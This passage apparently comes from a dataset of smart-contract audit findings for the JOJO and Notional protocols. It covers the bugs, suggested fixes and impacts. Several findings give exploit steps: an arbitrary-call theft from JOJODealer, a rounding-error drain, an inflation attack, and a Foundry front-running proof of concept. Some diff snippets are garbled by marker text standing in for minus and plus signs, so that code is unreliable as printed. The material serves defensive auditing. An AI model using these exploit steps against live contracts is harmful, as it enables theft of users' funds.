TokenHandler.getUnderlyingToken(currencyId); \\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n ); \\n\\n if (oracleData.currentExternalUnderlyingLend == 0) { \\n // If this is zero then there is no outstanding lending.\\n isExternalLendingUnhealthy = false; \\n } else {\\n uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() \\n .sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\n
Consider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$
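A sketch of the adjusted calculation inside `_isExternalLendingUnhealthy` (note that a `targetAmount == 0` case would need its own branch to avoid a division by zero):\\n```\\n// Sketch only: measure the deviation relative to the target rather than to the sum.\\nuint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt()\\n .sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount); // was: .div(targetAmount.add(oracleData.currentExternalUnderlyingLend))\\n```\\nWith the 90/100 example this now evaluates to 10 (i.e. 10%) instead of 5%, so the health check compares against the true deviation.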
The deviation between the target and current lending amount (offTargetPercentage) will be underestimated by roughly half most of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped, since the code incorrectly assumes that the off-target threshold has not been hit. External lending beyond the target will affect the liquidity of the protocol, potentially causing withdrawals or liquidations to fail due to insufficient liquidity.
```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n
All funds can be stolen from JOJODealer
high
`Funding._withdraw()` makes an arbitrary call with user-specified params. A user can, for example, craft an ERC20 transfer to himself and steal funds.\\nThe user can specify the parameters `param` and `to` when withdrawing:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nAt the end of the `_withdraw()` function, the address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), "target is not a contract");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector, an attacker can execute a withdrawal of 1 wei with `to` set to the USDC contract and pass calldata that transfers an arbitrary USDC amount to himself via the USDC contract.
Don't make arbitrary calls with user-specified params.
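If the callback behaviour has to be kept, one possible mitigation (a sketch, not existing JOJO code) is to restrict which targets can be called; `approvedCallTargets` below is a hypothetical owner-maintained allowlist:\\n```\\n// Sketch only: gate the arbitrary call behind an owner-maintained allowlist so the withdrawer\\n// cannot point the Dealer at token contracts or other privileged targets.\\nmapping(address => bool) public approvedCallTargets; // set via an onlyOwner function\\n\\nif (param.length != 0) {\\n require(Address.isContract(to), "target is not a contract");\\n require(approvedCallTargets[to], "call target not approved");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n}\\n```\\n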
All funds can be stolen from JOJODealer
```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n
FundingRateArbitrage contract can be drained due to rounding error
high
In `requestWithdraw`, rounding is done in the wrong direction, which can lead to the contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, "lockedEarnUSDCAmount is bigger than earnUSDCBalance"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which allows the user to withdraw more than they should be able to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated; let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext, the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nThe attacker calls `requestWithdraw` with `repayJUSDAmount` = `1` from the second, newly created EOA.\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from `jusdOutside[msg.sender]`).\\n`withdrawEarnUSDCAmount` will be `1`.\\nAfter `permitWithdrawRequests` is called, the attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. This leads to massive profit for the attacker.\\nThe attacker can repeat steps 2-6 until the contract is drained of JUSD.
Round up instead of down
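A sketch of the rounded-up computation, assuming `getIndex()` and `decimalDiv` use 1e18 fixed-point as in the quoted code; the ceil division is written out explicitly since a `decimalDivCeil` helper may not exist:\\n```\\n// Sketch only: round lockedEarnUSDCAmount up so repaying 1 wei of JUSD can never unlock a full share.\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = (jusdOutside[msg.sender] * 1e18 + index - 1) / index; // ceil\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, "lockedEarnUSDCAmount is bigger than earnUSDCBalance"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n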
All JUSD in the contract can be drained
```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, "lockedEarnUSDCAmount is bigger than earnUSDCBalance"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n
`JUSDBankStorage::getTRate()` and `JUSDBankStorage::accrueRate()` are calculated differently, and the resulting discrepancy causes `JUSDBank` contract function results to be incorrect
medium
```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\n`JUSDBankStorage::getTRate()` and `JUSDBankStorage::accrueRate()` compute the accrued rate with different formulas: `accrueRate()` compounds the fee multiplicatively onto the existing `tRate`, while `getTRate()` only adds a simple-interest term. The two values therefore drift apart, and the `JUSDBank` contract does not execute with consistent data.\\nThe inconsistent result biases the calculations of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc., and all functions that call these functions are biased as well
Use the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\n
Causes `JUSDBank` contract function results to be incorrect
```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n
Funding#requestWithdraw uses incorrect withdraw address
medium
When requesting a withdrawal, `msg.sender` is used in place of the `from` address. This means that withdrawals cannot be initiated on behalf of other users, which will break integrations that depend on this functionality, leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above, the withdrawal is accidentally queued to `msg.sender`, NOT the `from` address. This means that all withdrawals started on behalf of another user will actually trigger a withdrawal `from` the `operator`. The result is that withdrawals cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable funds
Change all occurrences of `msg.sender` in the state changes to `from` instead.
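A sketch of the corrected bookkeeping, keeping the existing `isWithdrawValid(state, msg.sender, from, ...)` authorization check and only changing the storage keys and event argument:\\n```\\n// Sketch only: record the pending withdrawal against `from`, the account being withdrawn from.\\nrequire(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\nstate.pendingPrimaryWithdraw[from] = primaryAmount;\\nstate.pendingSecondaryWithdraw[from] = secondaryAmount;\\nstate.withdrawExecutionTimestamp[from] = block.timestamp + state.withdrawTimeLock;\\nemit RequestWithdraw(from, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[from]);\\n```\\n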
Requesting withdrawals for other users is broken and strands funds
```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n
FundRateArbitrage is vulnerable to inflation attacks
medium
The index is calculated by dividing the net value of the contract (including USDC held) by the current supply of earnUSDC. Through a deposit and a donation, this ratio can be inflated. Then, when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nThe index is calculated by dividing the net value of the contract (including USDC held) by the current totalEarnUSDCBalance, and this can be inflated via a donation. Assume the user deposits 1 share and then donates 100,000e6 USDC. The exchange ratio is now 100,000e18, which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, "deposit amount is zero");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, "net value exceed limitation");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, "usdc amount bigger than quota");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice that earnUSDCAmount is amount / index. With the inflated index, any deposit under 100,000e6 will get zero shares, making this exactly like the standard ERC4626 inflation attack.
Use a virtual offset as suggested by OZ for their ERC4626 contracts
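A sketch of a virtual-offset variant of `getIndex()` in the spirit of the OZ ERC4626 mitigation; the offset constants are illustrative and would need to be sized against USDC's 6 decimals and the 1e18 index precision:\\n```\\n// Sketch only: virtual shares/assets bound how far a donation can move the index,\\n// making the first-depositor inflation unprofitable.\\nuint256 private constant VIRTUAL_EARN_USDC = 1e6; // hypothetical offset\\nuint256 private constant VIRTUAL_NET_VALUE = 1e6; // hypothetical offset\\n\\nfunction getIndex() public view returns (uint256) {\\n return SignedDecimalMath.decimalDiv(\\n getNetValue() + VIRTUAL_NET_VALUE,\\n totalEarnUSDCBalance + VIRTUAL_EARN_USDC\\n );\\n}\\n```\\nWhen the pool is empty this still returns 1e18, so the existing `totalEarnUSDCBalance == 0` special case can be dropped.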
Subsequent user deposits can be stolen
```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n
Lender transactions can be front-run, leading to lost funds
high
Users can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest rate is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints an amount larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nthe lender deposits underlying tokens to `mint` some shares and sets a `minImpliedRate` to protect the transaction\\nAlice front-runs the lender's transaction and invokes `mint` to `mint` some shares\\nthe amount of shares the lender is minting is now bigger than `maxFCash`\\nthe lender now ends up `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr("alice");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log("current maxFCash:",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert("Trade failed, slippage");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log("lender mint token:",w.balanceOf(LENDER));\\n console2.log("lender cost DAI:",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCash` is greater than `5000e8`, the lender's transaction will be reverted due to "Trade failed, slippage." Subsequently, if Alice front-runs by invoking `mint` to create some shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.
add a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,"Trade failed, slippage"); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\n
Loss of funds for the lender
```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n
Residual ETH will not be sent back to users during the minting of wfCash
high
Residual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n
If the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.
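A sketch of the wrapping step inside `_mintInternal`, immediately after the Notional call (it assumes the wrapper holds no native ETH outside this call and that the `WETH` reference exposes the standard payable `deposit()`):\\n```\\n// Sketch only: wrap any refunded native ETH back into WETH so the existing\\n// balanceBefore/balanceAfter accounting in _sendTokensToReceiver returns it to msg.sender.\\nNotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\nif (isETH && address(this).balance > 0) {\\n WETH.deposit{value: address(this).balance}();\\n}\\n```\\n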
Loss of assets as the residual ETH is not sent to the users.
```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n
Residual ETH not sent back when `batchBalanceAndTradeAction` executed
high
Residual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, "ETH Balance");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. 
Thus, the residual ETH will not be sent back to the users and will remain stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n
If the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.
Loss of assets as the residual ETH is not sent to the users.
```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n
_isExternalLendingUnhealthy() using stale factors
medium
In `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `getTargetExternalLendingAmount(factors)`, using stale `factors` leads to an inaccurate `targetAmount`, which in turn can cause `checkRebalance()` not to trigger a rebalance that should have been executed.\\nThe rebalancing bot uses `checkRebalance()` to return the `currencyIds []` that need to be rebalanced.\\nCall order: `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA key piece of logic here is computing `targetAmount`, and the calculation of this value depends on `factors`. However, the code currently uses `PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);`, which returns stored factors that have not yet been accrued up to the current block. The up-to-date factors should be fetched with `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.
